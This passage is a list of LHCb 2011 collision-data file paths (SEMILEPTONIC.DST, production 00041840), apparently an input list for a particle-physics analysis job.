'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00012592_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00043307_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00064726_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00019287_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00064310_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00066776_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00041233_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00030330_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00066710_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00026569_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00055777_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00043972_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00062039_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00069231_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00008532_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00007354_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00067555_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00028773_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00042725_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00008357_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00035690_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00019565_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00024240_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00037772_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00049223_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00044267_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00023128_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00033626_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00044654_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00047311_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00003176_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00052040_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00067040_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00039164_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00038768_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00008646_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00064232_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00007269_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00008320_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00063442_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00058370_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00017680_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00061478_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00014764_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00009436_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00016451_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00031530_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00064238_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00052066_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00057169_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00040103_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00057247_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00013165_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00057309_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00064555_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00005055_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00049266_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00007869_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00005155_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00055004_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00057565_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00008600_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00051043_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00061198_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00042881_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00058526_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00060023_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00027537_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00052759_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00055012_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00009334_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00025345_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00017469_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00032508_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00040156_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00058013_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00027494_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00024129_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00024066_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00062956_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00062991_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00010158_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00027225_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00017899_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00062188_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00055942_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00056642_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00047368_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00060482_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00057673_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00031494_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00039365_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00030851_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00008227_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00045739_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00022579_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00024130_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00017724_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00028224_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00044663_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00036000_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00069287_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00000473_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00059446_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00023355_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00001936_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00061472_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00061504_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00019385_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00043511_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00001646_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00029412_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00028351_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00062406_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00019599_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00045364_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00010108_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00050076_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00060491_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00010583_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00054661_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00044469_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00031711_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00058131_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00066526_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00008489_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00042950_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00042791_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00057490_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00055829_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00054183_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00010386_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00056416_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00022552_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00066033_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00018270_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00002797_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00000270_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00045397_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00041085_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00031103_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00031795_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00011301_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00000741_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00029804_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00025031_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00012142_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00013117_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00060017_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00019665_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00049683_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00025099_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00050929_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00058559_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00032177_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00063145_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00007994_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00017340_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00047840_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00033882_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00060761_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00039672_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00022919_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00025454_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00030247_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00027755_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00034528_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00057465_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00063174_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00048000_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00033103_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00000430_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00013571_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00033567_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00044769_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00039648_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00032448_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00043482_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00039474_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00038992_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00008102_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00010232_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00007028_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00028983_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00056513_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00051483_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00042170_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00059330_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00018171_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00004109_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00047815_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00063854_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00008833_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00057724_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00048146_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00050743_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00065613_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00054731_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00017278_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00022124_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00030116_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00021040_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00056270_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00062277_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00009419_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00025342_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00009626_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00024365_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00064156_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00062610_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00018106_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00044188_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00062922_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00003524_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00025583_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00002917_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00060075_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00017117_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00016166_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00042654_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00058609_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00054467_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00044921_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00035136_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00060273_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00063630_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00003161_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00028508_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00035549_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00038397_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00064877_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00067420_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00038762_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00000402_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00059763_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00047289_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00017280_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00001833_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00027544_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00048029_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00011108_1.semileptonic.dst',
